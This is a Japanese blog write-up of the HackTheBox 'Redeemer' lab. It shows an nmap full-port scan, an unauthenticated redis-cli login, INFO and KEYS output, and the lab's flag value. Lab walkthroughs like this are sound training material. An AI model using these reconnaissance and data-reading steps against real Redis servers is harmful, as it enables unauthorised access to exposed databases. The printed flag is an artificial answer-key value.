LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

@kenryo

HackTheBox Redeemer Writeup

Posted at

はじめに

本記事は「HackTheBox:Redeemer」のwriteupです。

問題

Redisサーバに乗り込みフラグを探す問題です。

回答

とりあえず、ポートスキャンします。
スキャン対象は全ポート(-p-)を指定します。
これだとスキャンに時間がかかるため、最低スキャン速度--min-rate 5000を指定しました。
結果redis(tcp/6379)が公開されていることがわかりました。

┌──(kali㉿kali)-[~]
└─$ nmap -p- --min-rate 5000 10.129.76.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-24 23:02 JST
Warning: 10.129.76.135 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.76.135
Host is up (0.18s latency).
Not shown: 47283 closed tcp ports (conn-refused), 18251 filtered tcp ports (no-response)
PORT     STATE SERVICE
6379/tcp open  redis

Nmap done: 1 IP address (1 host up) scanned in 61.81 seconds

次に、redis-cliでサーバに繋いでみます。
-hオプションにIPアドレスを指定し、ログインすることができました。

┌──(kali㉿kali)-[~]
└─$ redis-cli -h 10.129.76.135
10.129.76.135:6379>

INFOコマンドでRedisサーバの統計情報を取得できます。

10.129.76.135:6379> INFO
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:752
run_id:d55762b6f01c2f7a968de97a0609aed31042866a
tcp_port:6379
uptime_in_seconds:1840
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:4624025
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6029312
used_memory_rss_human:5.75M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.12%
used_memory_overhead:846142
used_memory_startup:796224
used_memory_dataset:13482
used_memory_dataset_perc:21.26%
allocator_allocated:1540408
allocator_active:1880064
allocator_resident:11202560
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.22
allocator_frag_bytes:339656
allocator_rss_ratio:5.96
allocator_rss_bytes:9322496
rss_overhead_ratio:0.54
rss_overhead_bytes:-5173248
mem_fragmentation_ratio:7.37
mem_fragmentation_bytes:5211696
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1682344686
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:409600
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:7
total_commands_processed:6
instantaneous_ops_per_sec:0
total_net_input_bytes:306
total_net_output_bytes:11572
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:493
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:e8ec4187fdf83b0ff8e3629dfb79acece98264da
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:1.735783
used_cpu_user:2.060146
used_cpu_sys_children:0.000000
used_cpu_user_children:0.002442

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0

なお、INFOで出力されるKeyspaceにはこのデータベースのキー数が記載されています。

# Keyspace
db0:keys=4,expires=0,avg_ttl=0

さらに、KEYS *で全てのキーを取得することができます。

10.129.76.135:6379> KEYS *
1) "temp"
2) "numb"
3) "flag"
4) "stor"

GET キー名でキーに対応した値を取得することできます。
flagというキー名の値が今回のフラグです。

10.129.76.135:6379> GET temp
"1c98492cd337252698d0c5f631dfb7ae"
10.129.76.135:6379> get numb
"bb2c8a7506ee45cc981eb88bb81dddab"
10.129.76.135:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"
10.129.76.135:6379> get stor
"e80d635f95686148284526e1980740f8"

参考

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?